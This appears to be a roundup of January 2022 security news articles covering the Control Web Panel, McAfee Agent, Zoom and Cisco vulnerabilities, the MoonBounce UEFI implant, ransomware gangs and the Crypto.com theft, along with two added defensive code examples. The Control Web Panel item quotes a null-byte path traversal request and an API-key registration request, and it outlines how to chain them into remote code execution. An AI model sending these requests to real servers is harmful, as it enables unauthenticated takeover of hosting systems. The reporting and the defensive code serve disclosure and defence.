The NCSC will continue to share information through its website and GitHub repository, the latter contains operational information regarding the Log4shell vulnerability in the Log4j logging library. Especially CVE-2021-44228 / CVE-2021-45046 and also covers CVE-2021-4104 / CVE-2021-45105.  


Vulnerabilities in Control Web Panel potentially expose Linux Servers to hack

22 January 2022 at 16:29

Two critical security vulnerabilities in Control Web Panel potentially expose Linux servers to remote code execution attacks.

Researchers from Octagon Networks disclosed details of two critical security flaws in Control Web Panel that potentially expose Linux servers to remote code execution attacks.

Control Web Panel is a popular open-source Linux control panel for servers and VPS that allows easy management of web hosting environments.

An attacker could chain the vulnerabilities to achieve pre-authenticated remote code execution on vulnerable Linux servers.

The first issue, tracked as CVE-2021-45467, is a file inclusion vulnerability, a class of bug in which a web application is tricked into exposing or running arbitrary files on the web server.

The experts focused their analysis on vulnerabilities that can be exploited by unauthenticated users or through zero-click attacks; in particular, they tested sections of the panel that are exposed without authentication in the webroot, including /user/loader.php and /user/index.php.

Paulos Yibelo from Octagon Networks discovered that several PHP functions (including require() and include()) seem to process /.%00./ as /../. The protections implemented in the application do not allow switching to a parent directory (using “..”), but they let the PHP interpreter accept a specially crafted string such as “.%00.”, which bypasses that restriction.

Similarly, while stristr() ignores null bytes, it still counts their size, so the crafted string bypasses the check.

This means that it is possible to include any file on the server; if an attacker also finds a way to write to a file, they can get pre-auth RCE.
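The following is an added illustration, not code from CWP or from the Octagon writeup: it models the deny-list check described above (a substring test for “..” on the raw parameter) next to a hardened check that decodes the parameter exactly once, refuses NUL bytes, allow-lists characters and confines the resolved path to a script root. The root directory, the function names and the sample inputs are assumptions constructed for the example.

```python
"""Hardened include-path validation, shown beside the weak check it replaces.

Added example; none of this is Control Web Panel's own source. The script
root below is a constructed placeholder, not a real CWP path.
"""
import posixpath
import re
from urllib.parse import unquote

# Constructed placeholder for the directory that 'scripts=' values may point into.
SCRIPT_ROOT = "/srv/panel/user"

# Allow-list: script names start with a letter/digit/underscore and contain
# only characters a legitimate panel script name would use.
ALLOWED_NAME = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_/.-]*$")

# Constructed sample of the traversal string quoted in the writeup above.
NULL_BYTE_TRAVERSAL = ".%00./.%00./api/account_new_create"


def weak_check(scripts: str) -> bool:
    """Model of the bypassed protection: reject only a literal '..' in the raw value.

    Returns True when the request would be allowed. Because the URL-encoded
    NUL byte sits between the two dots, '.%00.' never matches '..'.
    """
    return ".." not in scripts


def resolve_script(scripts: str, root: str = SCRIPT_ROOT):
    """Return the on-disk path for a 'scripts=' value, or None if it must be refused."""
    decoded = unquote(scripts)  # decode exactly once; never decode twice

    # 1. A NUL byte has no legitimate place in a script name; refuse it before
    #    any string function that might treat it inconsistently sees it.
    if "\x00" in decoded:
        return None

    # 2. Allow-list instead of deny-list: leading '.', '/', '%' and other
    #    characters never used by real script names are rejected outright.
    if not ALLOWED_NAME.match(decoded):
        return None

    # 3. Normalise lexically and confirm the result is still inside the root,
    #    so any remaining traversal component cannot escape it.
    candidate = posixpath.normpath(posixpath.join(root, decoded))
    if posixpath.commonpath([root, candidate]) != root:
        return None

    return candidate + ".php"


if __name__ == "__main__":
    # Constructed inputs: the writeup's payload, a plain traversal and a benign name.
    for value in (NULL_BYTE_TRAVERSAL, "../../api/account_new_create", "index"):
        print(f"{value!r:45} weak_check={weak_check(value)!s:5} "
              f"hardened={resolve_script(value)}")
```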

Despite the Unix file read/write locking settings in CWP, an attacker can exploit the file inclusion bug to reach the restricted API section, which requires an API key to access and is not exposed in the webroot.

By chaining this flaw with an arbitrary file write vulnerability, such as the CVE-2021-45466 flaw, an attacker can gain full remote code execution on the server.

“But by using our file inclusion, sending a request like the following will result in the server registering any API key we want.” explained the expert.

GET https://CWP/user/loader.php?api=1&scripts= .%00./.%00./api/account_new_create&acc=guadaapi&ip= 

“Now we have added the api key “OCTAGON” requesting from to have access to the full API like the following: 

GET https://CWP/api/?key=OCTAGON&api=add_server is now a valid API request.

The expert found a way to exploit a file write bug in the API section that allowed him to write to a .TXT file, for example by using a maliciously added key.

That request writes to a file called authorized_keys located in the /resources/ folder. Then, using the first file inclusion bug, the expert includes the malicious authorized_keys file to get full RCE.

The CWP maintainers have already addressed the flaw with security updates released this month.

US Treasury Department sanctions 4 Ukrainian officials for working with Russian intelligence

22 January 2022 at 13:20

The U.S. Treasury Department announced sanctions against four current and former Ukrainian government officials for collaborating with Russia.

The U.S. Treasury Department this week announced sanctions against four current and former Ukrainian government officials for having supported influence activities carried out by the Russian government. The officials are accused of having gathered sensitive information about critical infrastructure in Ukraine.

“Today, the Department of the Treasury’s Office of Foreign Assets Control (OFAC) sanctioned four individuals engaged in Russian government-directed influence activities to destabilize Ukraine.” reads the press release published by U.S. Treasury Department. “This action is separate and distinct from the broad range of high impact measures the United States and its Allies and partners are prepared to impose in order to inflict significant costs on the Russian economy and financial system if it were to further invade Ukraine.”

According to the US agency, Russia’s security service, the Federal Security Service (FSB), recruited Ukrainian citizens in key positions to destabilize the country politically and socially.

The four individuals played different roles in the influence campaign, supporting Russian threat actors in carrying it out.

Two of the four individuals, Taras Kozak and Oleh Voloshyn, who are two current Ukrainian Members of Parliament from the party led by Victor Medvedchuk (Medvedchuk), supported Russian disinformation by amplifying false narratives and undermining Ukrainian sovereignty.

Kozak controls several news channels in Ukraine and is accused of having supported the Russian intelligence to denigrate senior members of Ukrainian President Volodymyr Zelenskyy’s inner circle, accusing them of mismanagement of the COVID-19 pandemic.

Voloshyn has worked with Russia-linked actors to undermine Ukrainian government officials and advocate on behalf of Russia.

Vladimir Sivkovich, former Deputy Secretary of the Ukrainian National Security and Defense Council, supported Russian intelligence in carrying out influence operations to support the decision for Ukraine to officially cede Crimea to Russia in exchange for a drawdown of Russian-backed forces in the Donbas.

Volodymyr Oliynyk is a former Ukrainian official who currently resides in Moscow. He shares Russia’s anti-Western sentiments and in 2021 he worked for the FSB to gather information about Ukrainian critical infrastructure.

“As Russia has pursued broad cyber operations against critical infrastructure, it has focused on disrupting one critical infrastructure sector in particular: Ukraine’s energy sector. Russia has also degraded Ukraine’s access to energy products in the middle of winter. Acting” continues the Treasury Department.

The US agency ordered to block all property and interests in property of the designated individuals described above that are in the United States or in the possession or control of U.S. persons. Any entities that are owned, directly or indirectly, 50 percent or more by one or more blocked persons are also blocked. 

“The prohibitions include the making of any contribution or provision of funds, goods, or services by, to, or for the benefit of any blocked person, or the receipt of any contribution or provision of funds, goods, or services from any such person.” concludes the agency.

A bug in McAfee Agent allows running code with Windows SYSTEM privileges

21 January 2022 at 22:19

McAfee addressed a security flaw in its McAfee Agent software for Windows that allows running arbitrary code with SYSTEM privileges.

McAfee (now Trellix) has addressed a high-severity vulnerability, tracked as CVE-2022-0166, that resides in McAfee Agent software for Windows. An attacker can exploit this flaw to escalate privileges and execute arbitrary code with SYSTEM privileges.

The McAfee Agent is the distributed component of McAfee ePolicy Orchestrator (McAfee ePO). It downloads and enforces policies, and executes client-side tasks such as deployment and updating. The Agent also uploads events and provides additional data regarding each system’s status. It must be installed on each system in your network that you wish to manage.

The CVE-2022-0166 flaw was discovered by CERT/CC vulnerability analyst Will Dormann.

“A privilege escalation vulnerability in the McAfee Agent prior to 5.7.5. McAfee Agent uses openssl.cnf during the build process to specify the OPENSSLDIR variable as a subdirectory within the installation directory.” reads the advisory published by McAfee. “A low privilege user could have created subdirectories and executed arbitrary code with SYSTEM privileges by creating the appropriate pathway to the specifically created malicious openssl.cnf file.”

The security firm addressed the vulnerability with the release of McAfee Agent 5.7.5 on January 18.

The issue affects Agent versions prior to 5.7.5 and allows unprivileged attackers to run code with NT AUTHORITY\SYSTEM account privileges.

An unprivileged user can place a specially-crafted openssl.cnf in a location used by McAfee Agent, to execute arbitrary code with SYSTEM privileges on a Windows system running a vulnerable version of the agent software.

“By placing a specially-crafted openssl.cnf in a location used by McAfee Agent, an unprivileged user may be able to execute arbitrary code with SYSTEM privileges on a Windows system with the vulnerable McAfee Agent software installed.” reads the advisory published by CERT/CC.

The vulnerability is only exploitable locally; however, experts warn that it could be chained with other issues to compromise the target system and elevate permissions in order to carry out additional malicious activities.

McAfee also addressed a command injection vulnerability, tracked as CVE-2021-31854, in McAfee Agent for Windows prior to 5.7.5. An attacker could exploit this vulnerability to inject arbitrary shell code into the file cleanup.exe.

“The malicious clean.exe file is placed into the relevant folder and executed by running the McAfee Agent deployment feature located in the System Tree. An attacker may exploit the vulnerability to obtain a reverse shell which can lead to privilege escalation to obtain root privileges.” states the advisory.

Experts warn of anomalous spyware campaigns targeting industrial firms

21 January 2022 at 19:27

Researchers spotted several spyware campaigns targeting industrial enterprises to steal credentials and conduct financial fraud.

Researchers from Kaspersky Lab have uncovered multiple spyware campaigns that target industrial firms to steal email account credentials and carry out fraudulent activities.

Threat actors sent spear-phishing messages from compromised corporate accounts to their contacts; the emails carry malicious attachments. The attackers use off-the-shelf spyware, but in order to avoid detection they limited the scope and lifetime of each sample to the bare minimum.

These attacks were aimed at a very limited number of targets, they employed several spyware families, such as AgentTesla/Origin Logger, HawkEye, Noon/Formbook, Masslogger, Snake Keylogger, Azorult, Lokibot.

Kaspersky labeled these campaigns as ‘anomalous’ due to their very short-lived nature, roughly 25 days.

“The lifespan of the “anomalous” attacks is limited to about 25 days. And at the same time, the number of attacked computers is less than 100, of which 40-45% are ICS machines, while the rest are part of the same organizations’ IT infrastructure.” reads the analysis published by Kaspersky. “This has become a trend: around 21.2% of all spyware samples blocked on ICS computers worldwide in H1 2021 were part of this new limited-scope short-lifetime attack series and, depending on the region, up to one-sixth of all computers attacked with spyware were hit using this tactic.”

Attackers targeted fewer than one hundred systems in each campaign, more than half of them ICS systems deployed in industrial environments.

Unlike common spyware attacks, most of the samples employed in these campaigns were configured to use SMTP-based (rather than FTP or HTTP(s)) C2s as a one-way communication channel, a circumstance that suggests it was used only to exfiltrate data from infected systems.

Kaspersky researchers speculate that the stolen data is used by threat actors to move deeper into the compromised network and to target other organizations in order to collect more credentials.

The attackers use corporate mailboxes compromised in previous attacks as the C2 servers for further attacks.

“Amongst attacks of this kind, we’ve noticed a large set of campaigns that spread from one industrial enterprise to another via hard-to-detect phishing emails disguised as the victim organizations’ correspondence and abusing their corporate email systems to attack through the contact lists of compromised mailboxes.” continues the report.

“Curiously, corporate antispam technologies help the attackers stay unnoticed while exfiltrating stolen credentials from infected machines by making them ‘invisible’ among all the garbage emails in spam folders.”

The experts have identified over 2,000 corporate email accounts belonging to industrial companies that were used as C2 servers for successive spyware campaigns. The number of stolen and sold corporate email accounts that were abused has been estimated to be greater than 7000.

Many of the email, RDP, SMTP, SSH, cPanel, and VPN account credentials siphoned by the attackers were made available on dark web marketplaces and sold to other threat actors.

“In this research, we identified over 25 different marketplaces where data stolen in the credential gathering campaigns targeting industrial companies that we investigated was being sold. At these markets, various sellers offer thousands of RDP, SMTP, SSH, cPanel, and email accounts, as well as malware, fraud schemes, and samples of emails and webpages for social engineering.” concludes the report. “A statistical analysis of metadata for over 50,000 compromised RDP accounts sold in marketplaces shows that 1,954 accounts (3.9%) belong to industrial companies.”

Google Project Zero discloses details of two Zoom zero-day flaws

21 January 2022 at 14:40

Google Project Zero experts disclosed details of two zero-day flaws impacting Zoom clients and Multimedia Router (MMR) servers.

Google Project Zero researcher Natalie Silvanovich disclosed details of two zero-day vulnerabilities in Zoom clients and Multimedia Router (MMR) servers. An attacker could have exploited the now-fixed issues to crash the service, execute malicious code, and even leak the content of portions of the memory.

The researcher focused her search for bugs on the Zoom client software, including zero-day issues that allowed her to take over the victim’s system without requiring any user interaction.

The two vulnerabilities were fixed on November 24, 2021; they are a buffer overflow and an information leakage issue, tracked as CVE-2021-34423 and CVE-2021-34424 respectively.

The CVE-2021-34423 vulnerability is a buffer overflow issue that received a CVSS score of 9.8. An attacker can trigger the vulnerability to execute arbitrary code or crash the service or application.

The experts focused the analysis on the RTP (Real-time Transport Protocol) traffic used for audio and video communications. Silvanovich discovered that manipulating the contents of a buffer that supports reading different data types, by sending a malformed chat message, could trigger the flaw and cause the client and the MMR server to crash.

“Note that the string buffer is allocated based on a length read from the msg_db_t buffer, but then a second length is read from the buffer and used as the length of the string that is read. This means that if an attacker could manipulate the contents of the msg_db_t buffer, they could specify the length of the buffer allocated, and overwrite it with any length of data (up to a limit of 0x1FFF bytes, not shown in the code snippet above).” reads the analysis published by Project Zero. “I tested this bug by hooking SSL_write with Frida, and sending the malformed packet, and it caused the Zoom client to crash on a variety of platforms.”

CVE-2021-34424 is a process memory exposure flaw that received a CVSS score of 7.5. An attacker can trigger the flaw to potentially gain insight into arbitrary areas of the product’s memory.

The second flaw is caused by the lack of a NULL check, which allows leaking data from memory by joining a Zoom meeting via a web browser.

“This bug allows the attacker to provide a string of any size, which then gets copied out of bounds up until a null character is encountered in memory, and then returned. It is possible for CVE-2021-34424 to return a heap pointer, as the MMR maps the heap that gets corrupted at a low address that does not usually contain null bytes, however, I could not find a way to force a specific heap pointer to be allocated next to the string buffer that gets copied out of bounds. C++ objects used by the MMR tend to be virtual objects, so the first 64 bits of most object allocations are a vtable which contains null bytes, ending the copy.” continues the analysis.

The researcher pointed out that the lack of ASLR in the Zoom MMR process exposed users to the risk of attacks; the good news is that Zoom has recently enabled it.

Project Zero experts also pointed out that the closed nature of Zoom heavily impacted the analysis. Unlike most video conferencing systems, Zoom uses a proprietary protocol that makes it hard to analyze.

“Closed-source software presents unique security challenges, and Zoom could do more to make their platform accessible to security researchers and others who wish to evaluate it,” Silvanovich concludes. “While the Zoom Security Team helped me access and configure server software, it is not clear that support is available to other researchers, and licensing the software was still expensive.”

MoonBounce UEFI implant spotted in a targeted APT41 attack

21 January 2022 at 11:59

Researchers have spotted China-linked APT41 cyberespionage group using a UEFI implant, dubbed MoonBounce, to maintain persistence.

Kaspersky researchers spotted the China-linked APT41 cyberespionage group using a UEFI implant, dubbed MoonBounce, to maintain persistence.

At the end of 2021, Kaspersky researchers discovered a UEFI firmware-level compromise by analyzing logs from the company’s Firmware Scanner.

Threat actors compromised a single component within the firmware image to intercept the original execution flow of the machine’s boot sequence and inject the sophisticated implant.

UEFI implants like MoonBounce allow attackers to achieve persistence on the target system that is resilient to disk formatting or replacement. In the case of MoonBounce, the bootkit is implanted in the SPI flash memory of the motherboard. A UEFI bootkit implanted in the firmware cannot be detected by AVs or by any defense solution running at the OS level.

“The purpose of the implant is to facilitate the deployment of user-mode malware that stages execution of further payloads downloaded from the internet;” reads the analysis published by Kaspersky. “The infection chain itself does not leave any traces on the hard drive, as its components operate in memory only, thus facilitating a fileless attack with a small footprint;”

The attackers incorporated the UEFI implant into the CORE_DXE component of the firmware (aka the DXE Foundation), which is invoked early on in the DXE (Driver Execution Environment) phase of the UEFI boot sequence.

The infection leverages a set of hooks that intercept the execution of several functions in the EFI Boot Services Table, namely AllocatePool, CreateEventEx and ExitBootServices. The attackers used these hooks to divert the flow of those functions to malicious shellcode appended to the CORE_DXE image, which in turn sets up additional hooks in subsequent components of the boot sequence (the Windows loader).

“This multistage chain of hooks facilitates the propagation of malicious code from the CORE_DXE image to other boot components during system startup, allowing the introduction of a malicious driver to the memory address space of the Windows kernel.” continues the analysis. “This driver, which runs during the initial phases of the kernel’s execution, is in charge of deploying user-mode malware by injecting it into an svchost.exe process, once the operating system is up and running.”

The UEFI implant used by APT41 is meant to deploy additional user-mode malware, which in turn executes further payloads downloaded from the C2 infrastructure.

Kaspersky pointed out that the attack it investigated is fileless, meaning that it does not leave any traces on the hard drive and its components operate only in memory.

The researchers spotted other, non-UEFI implants in the network targeted with MoonBounce that were communicating with the same infrastructure that hosted the staging payload.

The researchers explained that the MoonBounce UEFI bootkit was employed in a very targeted attack; the sophisticated malware was detected in a single case.

“We traced some of the commands executed by the attackers after gaining a foothold in the network, which point to lateral movement and exfiltration of information from particular machines. This aligns in profile with some of the previous operations by APT41, wherein intrusions were typically made to intervene in the targeted companies’ supply chain, or to heist sensitive intellectual property and personally identifiable information.” continues the report. “The usage of the UEFI implant in particular indicates the actor’s aim to establish a longstanding foothold within the network, as would be expected in an ongoing espionage activity.”

This is the third publicly documented case of a firmware rootkit used in attacks in the wild; previous attacks leveraging this family of malware were related to the FinSpy surveillance spyware tool and to a cyber espionage campaign uncovered by ESET that was spreading the ESPecter bootkit.

“MoonBounce marks a particular evolution in this group of threats by presenting a more complicated attack flow in comparison to its predecessors and a higher level of technical competence by its authors, who demonstrate a thorough understanding of the finer details involved in the UEFI boot process,” Kaspersky concludes.

In order to prevent such attacks, Kaspersky recommends regularly updating UEFI firmware, verifying that BootGuard, where applicable, is enabled, enabling Trusted Platform Modules, and deploying a security product that is able to inspect the firmware images.

Conti ransomware gang started leaking files stolen from Bank Indonesia

21 January 2022 at 06:22

The central bank of the Republic of Indonesia, Bank Indonesia, confirmed the ransomware attack that hit it in December.

Bank Indonesia confirmed that it was the victim of a ransomware attack that took place last month. The Conti ransomware gang claimed the attack and leaked some allegedly stolen files as proof of the security breach.

A bank spokesperson told Reuters that the ransomware attack did not impact services.

“We were attacked, but so far so good as we took anticipatory measures and most importantly public services at Bank Indonesia were not disrupted at all,” its spokesperson Erwin Haryono told reporters.

According to CNN Indonesia, a spokesman for Indonesia’s cyber agency (BSSN) said no critical data was leaked and the attacks occurred in a Bank Indonesia office on Sumatra island.

Conti operators have added Bank Indonesia to the list of victims on their Tor leaks site, the gang claims to have stolen 13.88 GB worth of files.

Conti operators run a private Ransomware-as-a-Service (RaaS); the malware appeared in the threat landscape at the end of December 2019 and was distributed through TrickBot infections. Experts speculate the operators are members of a Russia-based cybercrime group known as Wizard Spider.

Since August 2020, the group has run a leak site to threaten its victims with the release of the stolen data. Conti operators claim to have already compromised at least 500 organisations worldwide.

In December 2021, the Australian Cyber Security Centre (ACSC) warned of Conti ransomware attacks against multiple Australian organizations from various sectors since November.

The ACSC also published a ransomware profile for the Conti gang that contains information about the operations of the group, including mitigations.

In September, CISA, the Federal Bureau of Investigation (FBI), and the National Security Agency (NSA) also warned of an increased number of Conti gang attacks against US organizations.

FBI links the Diavol ransomware to the TrickBot gang

20 January 2022 at 22:45

The Federal Bureau of Investigation (FBI) officially linked the Diavol ransomware operation to the infamous TrickBot gang.

The FBI officially linked the Diavol ransomware operation to the infamous TrickBot gang, the group that is behind the TrickBot banking trojan.

“The FBI first learned of Diavol ransomware in October 2021. Diavol is associated with developers from the Trickbot Group, who are responsible for the Trickbot Banking Trojan. Diavol encrypts files solely using an RSA encryption key, and its code is capable of prioritizing file types to encrypt based on a pre-configured list of extensions defined by the attacker. While ransom demands have ranged from $10,000 to $500,000, Diavol actors have been willing to engage victims in ransom negotiations and accept lower payments.” reads the flash alert published by the FBI. “The FBI has not yet observed Diavol leak victim data, despite ransom notes including threats to leak stolen information.”

TrickBot is a popular banking Trojan that has been around since October 2016, its authors have continuously upgraded it by implementing new features. Operators continue to offer the botnet through a multi-purpose malware-as-a-service (MaaS) model. Threat actors leverage the botnet to distribute a broad range of malware including info-stealer and ransomware such as Conti and Ryuk. To date, the Trickbot botnet has already infected more than a million computers.

The TrickBot Gang is also behind the development of the BazarBackdoor and Anchor backdoors.

In July, researchers from Fortinet first spotted the new ransomware family, tracked as Diavol, and speculated it might have been developed by Wizard Spider, the cybercrime gang behind the TrickBot botnet.

Fortinet experts noticed similarities between Diavol and Conti threats, but unlike Conti, Diavol doesn’t avoid infecting Russian victims.

In August, IBM X-Force researchers conducted a new analysis of an old variant of the threat that, unlike the one analyzed by Fortinet experts, appears to be a development version used for testing purposes.

The comparison of the two versions allowed the researchers to get insight into the development process of Diavol and of future versions of the malware.

The analysis conducted by IBM X-Force researchers reinforced the link between Diavol ransomware and the TrickBot malware.

Now the FBI’s report provides technical details about the Diavol Ransomware and its link to the TrickBot gang.

“The Bot ID generated by Diavol is nearly identical to the format used by TrickBot and the Anchor DNS malware, also attributed to Trickbot.” continues the report.

The FBI’s advisory also contains indicators of compromise along with mitigations for Diavol.

The FBI encourages victims of the gang to report information concerning suspicious or criminal activity to their local FBI field office.

The FBI also urges all victims of the Diavol operation, to notify law enforcement of attacks.

Cisco StarOS flaws could allow remote code execution and information disclosure

20 January 2022 at 19:04

Cisco addressed a critical RCE flaw in the Cisco Redundancy Configuration Manager (RCM) for Cisco StarOS Software.

Cisco has addressed a critical remote code execution vulnerability, tracked as CVE-2022-20649, discovered in the Cisco Redundancy Configuration Manager (RCM) for Cisco StarOS Software.

The flaw, discovered by the company experts during internal security testing, can be exploited by unauthenticated attackers to gain remote code execution (RCE) with root-level privileges on vulnerable devices.

“A vulnerability in Cisco RCM for Cisco StarOS Software could allow an unauthenticated, remote attacker to perform remote code execution on the application with root-level privileges in the context of the configured container,” reads the advisory published by Cisco. “This vulnerability exists because the debug mode is incorrectly enabled for specific services. An attacker could exploit this vulnerability by connecting to the device and navigating to the service with debug mode enabled. A successful exploit could allow the attacker to execute arbitrary commands as the root user.”

The vulnerability exists due to the debug mode being incorrectly enabled for specific services.

Cisco pointed out that an attacker would need to perform detailed reconnaissance to allow for unauthenticated access; the issue could also be exploited by an authenticated attacker.

Cisco’s Product Security Incident Response Team (PSIRT) confirmed that the company is not aware of attacks in the wild exploiting this vulnerability.

Cisco also addressed an information disclosure vulnerability, tracked as CVE-2022-20648, in the Cisco RCM for Cisco StarOS. The flaw resides in a debug function of Cisco RCM for Cisco StarOS Software; an unauthenticated, remote attacker can exploit this issue to perform debug actions that could result in the disclosure of confidential information that should be restricted.

“This vulnerability exists because of a debug service that incorrectly listens to and accepts incoming connections. An attacker could exploit this vulnerability by connecting to the debug port and executing debug commands. A successful exploit could allow the attacker to view sensitive debugging information.” reads the advisory published by the IT giant.

The company addressed both flaws with the release of Cisco RCM for StarOS 21.25.4.

Crypto.com hack impacted 483 accounts and resulted in a $34 million theft

20 January 2022 at 15:05

Crypto.com confirmed that a cyber attack compromised around 400 of its customer accounts, resulting in the theft of $33 million.

Crypto.com is a cryptocurrency exchange app based in Singapore, the app currently has 10 million users and 3,000 employees. Recently, several Crypto.com users reported suspicious transactions that stole thousands of dollars in Ethereum (ETH) despite their accounts being protected with 2FA.

The company initially confirmed the unauthorized access to wallets belonging to a ‘small number’ of users.

This update will be rolled out to users progressively over the next few hours.

Once complete, withdrawals will be re-enabled.

We understand this may be an inconvenience, but security comes first.

Thank you for your support.

— Crypto.com (@cryptocom) January 17, 2022

The company reassured its users saying that all funds are safe.

Now the company’s CEO Kris Marszalek has confirmed during an interview with Bloomberg Live that 483 customer accounts were compromised and that threat actors stole $33 million worth of cryptocurrency.

JUST IN: CEO @cryptocom’s Kris Marszalek discusses the site's recent hack with @BloombergTV’s @emilychangtv. "Customer funds were never at risk." #TheYearAhead pic.twitter.com/YlCtGO60t5

— Bloomberg Live (@BloombergLive) January 19, 2022

“On 17 January 2022, Crypto.com learned that a small number of users had unauthorized crypto withdrawals on their accounts. Crypto.com promptly suspended withdrawals for all tokens to initiate an investigation and worked around the clock to address the issue. No customers experienced a loss of funds. In the majority of cases we prevented the unauthorized withdrawal, and in all other cases customers were fully reimbursed.” reads a security report published by Crypto.com. “The incident affected 483 Crypto.com users. Unauthorised withdrawals totalled 4,836.26 ETH, 443.93 BTC and approximately US$66,200 in other currencies.”

Initial news about the security breach reported the theft of 4,830 ETH (roughly $15 million), but according to ErgoBTC, an analyst at bitcoin research firm OXT Research, the attackers may have stolen around $33 million.

Adding another 444 BTC to the previously reported 4.6k ETH from yesterday's @cryptocom hack.

Still no acknowledgement of loss, despite large outflows from the custodial wallet into ETH's Tornado Cash and a well known BTC tumbler (as detailed below). pic.twitter.com/GalJKM6bi9

— ∴Ergo∴ (@ErgoBTC) January 18, 2022

ErgoBTC also discovered another wallet containing 172.9 BTC ($7 million) that belongs to the threat actors behind the Crypto.com security breach.

The threat actors may also have stolen 444 BTC ($18.4 million) from the exchange’s custodial wallet. Experts also reported that the threat actors have already laundered 271 BTC ($11 million) via a bitcoin tumbler service that was often used by North Korea-linked APT groups.

“Per ErgoBTC’s tweet on Tuesday, an additional 444 BTC ($18.5 million) was siphoned from Crypto.com’s payout wallet. Detailing the suspicious transactions, ErgoBTC said OXT Research first flagged a suspicious payout from the exchange’s custodial wallet to the tune of 52.55 BTC ($2.18 million).” reported an article published by TheBlockCrypto. “This transaction was followed by “several hundred withdrawals” as noted by ErgoBTC that were later batched into four outputs of 67.75 BTC ($2.81 million) each. These four batched outputs totaling 271 BTC ($11.25 million) were funneled via a bitcoin tumbler — a mixing service that allows users to combine different transactions to make it difficult to trace BTC transfers.”

The impacted accounts had been restored at the time of this writing; the company also revoked all customer 2FA tokens and announced that it has implemented additional security measures to protect its platform.

“Crypto.com introduced an additional layer of security on 18 January 2022 to add a mandatory 24-hour delay between registration of a new whitelisted withdrawal address, and first withdrawal. Users will receive notifications that withdrawal addresses have been added, to give them adequate time to react and respond. The notification message provides useful reminders and instructions on contacting our team if the address whitelisting was unauthorized.” states the company.
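The control described in that statement, a hold between whitelisting a withdrawal address and the first withdrawal to it, plus a notification that lets the account owner revoke an address they did not add, is straightforward to model. The code below is an added example written for this article, not Crypto.com's implementation; the account and address values are constructed, the 24-hour window is the figure from the statement, and the notification and revocation helpers are assumptions about how such a policy would be wired into an exchange backend.

```python
from dataclasses import dataclass, field
from datetime import datetime, timedelta, timezone
from typing import Dict, List, Tuple

# Hold period stated by the exchange: 24 hours from whitelisting to first withdrawal.
WHITELIST_DELAY = timedelta(hours=24)

# Constructed reference time for the worked scenario below.
T0 = datetime(2022, 1, 18, 0, 0, tzinfo=timezone.utc)


def ts(hours: float) -> datetime:
    """T0 plus the given number of hours; keeps the scenario readable."""
    return T0 + timedelta(hours=hours)


@dataclass
class WhitelistEntry:
    address: str
    added_at: datetime


@dataclass
class Account:
    user_id: str
    whitelist: Dict[str, WhitelistEntry] = field(default_factory=dict)
    notifications: List[str] = field(default_factory=list)  # assumed: delivered out of band

    def add_withdrawal_address(self, address: str, now: datetime) -> None:
        """Whitelist an address and tell the owner, so an unauthorized add can be caught."""
        self.whitelist[address] = WhitelistEntry(address, now)
        self.notifications.append(
            f"Withdrawal address {address} added at {now.isoformat()}; "
            f"withdrawals to it unlock at {(now + WHITELIST_DELAY).isoformat()}. "
            "If you did not add this address, revoke it and contact support."
        )

    def revoke_withdrawal_address(self, address: str) -> bool:
        """Owner (or support) removes an address; returns whether it existed."""
        return self.whitelist.pop(address, None) is not None


def check_withdrawal(account: Account, address: str, now: datetime) -> Tuple[bool, str]:
    """Policy decision for a withdrawal request: (allowed, reason)."""
    entry = account.whitelist.get(address)
    if entry is None:
        return False, "address not whitelisted"
    unlock_at = entry.added_at + WHITELIST_DELAY
    if now < unlock_at:
        remaining = unlock_at - now
        return False, f"address still in hold, {remaining} remaining"
    return True, "ok"


def scenario() -> Dict[str, bool]:
    """Constructed walk-through: an attacker with session access adds an address and
    tries to withdraw immediately; the owner, alerted, revokes it before the hold ends."""
    acct = Account("user-1")
    acct.add_withdrawal_address("bc1-attacker-constructed", ts(0))
    immediate, _ = check_withdrawal(acct, "bc1-attacker-constructed", ts(0.1))
    alerted = len(acct.notifications) == 1
    acct.revoke_withdrawal_address("bc1-attacker-constructed")
    after_revoke, _ = check_withdrawal(acct, "bc1-attacker-constructed", ts(25))

    # Legitimate owner adds their own address and waits out the hold.
    acct.add_withdrawal_address("bc1-owner-constructed", ts(1))
    too_early, _ = check_withdrawal(acct, "bc1-owner-constructed", ts(24.5))
    after_hold, _ = check_withdrawal(acct, "bc1-owner-constructed", ts(25))
    return {
        "attacker_blocked_immediately": not immediate,
        "owner_notified": alerted,
        "attacker_blocked_after_revoke": not after_revoke,
        "owner_blocked_before_hold_ends": not too_early,
        "owner_allowed_after_hold": after_hold,
    }


if __name__ == "__main__":
    for name, ok in scenario().items():
        print(f"{name}: {ok}")
```

The design point is that the hold converts a stolen session or bypassed 2FA from an instant loss into a window in which the notification can reach the owner; the check is made on the address, not the session, so it holds even when the attacker controls the login.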

Crypto.com announced the introduction of the Worldwide Account Protection Program (WAPP), which aims to protect user funds in cases where threat actors gain unauthorized access to a user’s account and withdraw funds without the user’s permission. WAPP will cover losses up to USD$250,000 for qualified users.

Pierluigi Paganini

(SecurityAffairs – hacking, BITCOIN)